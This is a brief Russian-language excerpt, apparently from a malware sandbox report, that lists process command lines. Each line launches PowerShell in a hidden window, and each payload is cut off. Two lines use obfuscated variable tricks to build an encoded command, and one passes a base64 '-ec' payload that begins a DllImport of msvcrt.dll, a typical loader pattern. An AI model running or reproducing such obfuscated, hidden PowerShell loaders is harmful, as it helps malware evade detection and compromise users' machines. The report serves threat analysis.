Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /w 1 /C "sv cMI -;sv FE ec;sv suy ((gv cMI).value.toString()+(gv FE).value.toString());powershell (gv suy).value.toString() ('JAB5AFEAPQAnACQAZwBMAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQB...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /w 1 /C "sv cMI -;sv FE ec;sv suy ((gv cMI).value.toString()+(gv FE).value.toString());powershell (gv suy).value.toString() ('JAB5AFEAPQAnACQAZwBMAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQB...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ec JAB5AFEAPQAnACQAZwBMAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByA...